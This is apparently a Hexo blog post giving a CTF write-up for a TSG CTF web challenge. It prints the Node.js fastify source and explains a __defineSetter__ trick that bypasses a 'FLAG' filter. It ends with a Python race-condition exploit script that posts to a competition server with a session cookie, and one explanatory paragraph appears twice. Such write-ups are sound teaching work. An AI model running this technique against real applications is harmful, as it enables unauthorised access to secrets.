<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>小叹</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="TSGctf web Code： const fastify &#x3D; require(&#39;fastify&#39;); const nunjucks &#x3D; require(&#39;nunjucks&#39;); const crypto &#x3D; require(&#39;crypto&#39;);   const converters &#x3D; &amp;#123;&amp;#125;;  const flagConve">
<meta property="og:type" content="article">
<meta property="og:title" content="小叹">
<meta property="og:url" content="http://yoursite.com/2020/07/14/TSGctf%20web/index.html">
<meta property="og:site_name" content="小叹">
<meta property="og:description" content="TSGctf web Code： const fastify &#x3D; require(&#39;fastify&#39;); const nunjucks &#x3D; require(&#39;nunjucks&#39;); const crypto &#x3D; require(&#39;crypto&#39;);   const converters &#x3D; &amp;#123;&amp;#125;;  const flagConve">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-07-14T01:59:06.648Z">
<meta property="article:modified_time" content="2020-07-14T01:59:06.648Z">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="小叹" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">小叹</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-TSGctf web" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/07/14/TSGctf%20web/" class="article-date">
  <time datetime="2020-07-14T01:59:06.648Z" itemprop="datePublished">2020-07-14</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>TSGctf web</p>
<p>Code：</p>
<pre><code>const fastify = require(&#39;fastify&#39;);
const nunjucks = require(&#39;nunjucks&#39;);
const crypto = require(&#39;crypto&#39;);


const converters = &#123;&#125;;

const flagConverter = (input, callback) =&gt; &#123;
  const flag = &#39;*** CENSORED ***&#39;;
  callback(null, flag);
&#125;;

const base64Converter = (input, callback) =&gt; &#123;
  try &#123;
    const result = Buffer.from(input).toString(&#39;base64&#39;);
    callback(null, result)
  &#125; catch (error) &#123;
    callback(error);
  &#125;
&#125;;

const scryptConverter = (input, callback) =&gt; &#123;
  crypto.scrypt(input, &#39;I like sugar&#39;, 64, (error, key) =&gt; &#123;
    if (error) &#123;
      callback(error);
    &#125; else &#123;
      callback(null, key.toString(&#39;hex&#39;));
    &#125;
  &#125;);
&#125;;


const app = fastify();
app.register(require(&#39;point-of-view&#39;), &#123;engine: &#123;nunjucks&#125;&#125;);
app.register(require(&#39;fastify-formbody&#39;));
app.register(require(&#39;fastify-cookie&#39;));
app.register(require(&#39;fastify-session&#39;), &#123;secret: Math.random().toString(2), cookie: &#123;secure: false&#125;&#125;);

app.get(&#39;/&#39;, async (request, reply) =&gt; &#123;
  reply.view(&#39;index.html&#39;, &#123;sessionId: request.session.sessionId&#125;);
&#125;);

app.post(&#39;/&#39;, async (request, reply) =&gt; &#123;
  if (request.body.converter.match(/[FLAG]/)) &#123;
    throw new Error(&quot;Don&#39;t be evil :)&quot;);
  &#125;

  if (request.body.input.length &lt; 10) &#123;
    throw new Error(&#39;Too short :(&#39;);
  &#125;

  if (request.body.input.length &gt; 1000) &#123;
    throw new Error(&#39;Too long :(&#39;);
  &#125;

  converters[&#39;base64&#39;] = base64Converter;
  converters[&#39;scrypt&#39;] = scryptConverter;
  converters[`FLAG_$&#123;request.session.sessionId&#125;`] = flagConverter;

  const result = await new Promise((resolve, reject) =&gt; &#123;
    converters[request.body.converter](request.body.input, (error, result) =&gt; &#123;
      if (error) &#123;
        reject(error);
      &#125; else &#123;
        resolve(result);
      &#125;
    &#125;);
  &#125;);

  reply.view(&#39;index.html&#39;, &#123;
    input: request.body.input,
    result,
    sessionId: request.session.sessionId,
  &#125;);
&#125;);

app.setErrorHandler((error, request, reply) =&gt; &#123;
  reply.view(&#39;index.html&#39;, &#123;error, sessionId: request.session.sessionId&#125;);
&#125;);

app.listen(59101, &#39;0.0.0.0&#39;);</code></pre><p>I never expected to be able to read JS, but because of the foundation of learning other languages, I was able to understand this simple code, so I wanted others to try it out.</p>
<p>1.By reading the source code, we can easily find several key points.</p>
<pre><code>const flagConverter = (input, callback) =&gt; &#123;
  const flag = &#39;*** CENSORED ***&#39;;
  callback(null, flag);
&#125;;</code></pre><pre><code>app.post(&#39;/&#39;, async (request, reply) =&gt; &#123;
  if (request.body.converter.match(/[FLAG]/)) &#123;
    throw new Error(&quot;Don&#39;t be evil :)&quot;);
  &#125;</code></pre><pre><code> converters[&#39;base64&#39;] = base64Converter;
  converters[&#39;scrypt&#39;] = scryptConverter;
  converters[`FLAG_$&#123;request.session.sessionId&#125;`] = flagConverter;</code></pre><p>So we need to bypass FLAG filtering. But I know little about JS. I didn’t know until after the game:</p>
<ol>
<li>Objects have multiple intrinsic JS function, one of them can be used to spit out the flag in errors :)</li>
</ol>
<pre><code>https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineSetter__</code></pre><p>The defineSetter function of any object is way to do extra things in callback when a values are assigned to its keys.</p>
<pre><code>var o = &#123;&#125;;
o.__defineSetter__(&#39;key&#39;, function(value) &#123; //we access value in callback &#125;);</code></pre><p>So following code</p>
<pre><code>converters[request.body.converter](request.body.input, (error, result) =&gt; &#123;
      if (error) &#123;
        reject(error);
      &#125; else &#123;
        resolve(result);
      &#125;
    &#125;);</code></pre><p>with <code>request.body.converter = __defineSetter__</code> and <code>request.body.input = FLAG_sessionId</code></p>
<p>will assign following callback for whenever converter object gets key <code>FLAG_sessionId</code> assigned a value.</p>
<pre><code>(error, result) =&gt; &#123;
      if (error) &#123;
        reject(error);
      &#125; else &#123;
        resolve(result);
      &#125;
    &#125;);</code></pre><p>In the first request, We just assign the callback and the Promise does not gets resolved so we are stuck at <code>const result = await new Promise((resolve, reject)</code></p>
<p>In the second consecutive request, The code <code>converters[</code>FLAG_${request.session.sessionId}<code>] = flagConverter;</code></p>
<p>will assign the value <code>flagConverter</code> function to our unique key for which we have set a callback, this <code>flagConverter</code> function will get passed down to callback as error and Our Promise will get rejected and the result gets assign with the whole function, and this result gets spit out in response to our first request which was waiting for this to happen.</p>
<p>In the first request, We just assign the callback and the Promise does not gets resolved so we are stuck at <code>const result = await new Promise((resolve, reject)</code></p>
<p>In the second consecutive request, The code <code>converters[</code>FLAG_${request.session.sessionId}<code>] = flagConverter;</code></p>
<p>will assign the value <code>flagConverter</code> function to our unique key for which we have set a callback, this <code>flagConverter</code> function will get passed down to callback as error and Our Promise will get rejected and the result gets assign with the whole function, and this result gets spit out in response to our first request which was waiting for this to happen.</p>
<pre><code class="python">import threading
import requests
import time 
cookie = &#123;&quot;sessionId&quot; : &quot;HcDcdC_lhEJjZPCM7S7nqdgi0kr32rYa.YTlYOIhk52YHs3NzP%2FFPuu6y7MK1ev6uX21jHbgxMXE&quot;&#125;
def sendPayload():    
    r = requests.post(&quot;http://34.85.124.174:59101&quot;,json=       &#123;&quot;converter&quot;:&quot;__defineSetter__&quot;,&quot;input&quot;:&quot;FLAG_HcDcdC_lhEJjZPCM7S7nqdgi0kr32rYa&quot;&#125;,cookies=cookie)    
    print(r.text) threading.Thread(target=sendPayload).start()time.sleep(1)requests.post(&quot;http://34.85.124.174:59101&quot;,json=&#123;&quot;converter&quot;:&quot;base64&quot;,&quot;input&quot;:&quot;FLAG_HcDcdC_lhEJjZPCM7S7nqdgi0kr32rYa&quot;&#125;,cookies=cookie)</code></pre>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2020/07/14/TSGctf%20web/" data-id="ckemqkeat000wastyapuk86e1" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/07/26/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A8(%E4%B8%80)/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2020/06/23/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E7%BB%83%E4%B9%A0%EF%BC%88%E4%B8%80%EF%BC%89/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/WEB/">WEB</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/WEB%EF%BC%8Cpython/">WEB，python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/pwn/">pwn</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%EF%BC%8Cweb/">攻防世界，web</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Jarvis-OJ/" rel="tag">Jarvis OJ</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB/" rel="tag">WEB</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%EF%BC%8Cphp/" rel="tag">WEB，php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%EF%BC%8Cupload/" rel="tag">WEB，upload</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/buuctf/" rel="tag">buuctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%EF%BC%8CJARvis-OJ/" rel="tag">web，JARvis OJ</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Jarvis-OJ/" style="font-size: 13.33px;">Jarvis OJ</a> <a href="/tags/PHP/" style="font-size: 13.33px;">PHP</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 13.33px;">SQL注入</a> <a href="/tags/WEB/" style="font-size: 20px;">WEB</a> <a href="/tags/WEB%EF%BC%8Cphp/" style="font-size: 10px;">WEB，php</a> <a href="/tags/WEB%EF%BC%8Cupload/" style="font-size: 13.33px;">WEB，upload</a> <a href="/tags/buuctf/" style="font-size: 10px;">buuctf</a> <a href="/tags/pwn/" style="font-size: 16.67px;">pwn</a> <a href="/tags/web%EF%BC%8CJARvis-OJ/" style="font-size: 10px;">web，JARvis OJ</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">八月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">七月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">六月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">五月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">四月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">三月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">一月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">十二月 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/08/11/%5BMRCTF2020%5DEzpop_Reveng/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/08/07/WebGoat%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%89%EF%BC%89XXE/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/08/07/Java%E5%8F%8D%E5%B0%84%E7%9A%84%E5%AD%A6%E4%B9%A0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/08/01/Webgoat%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%BA%8C%EF%BC%89/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/07/31/Webgoat8%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 小叹<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>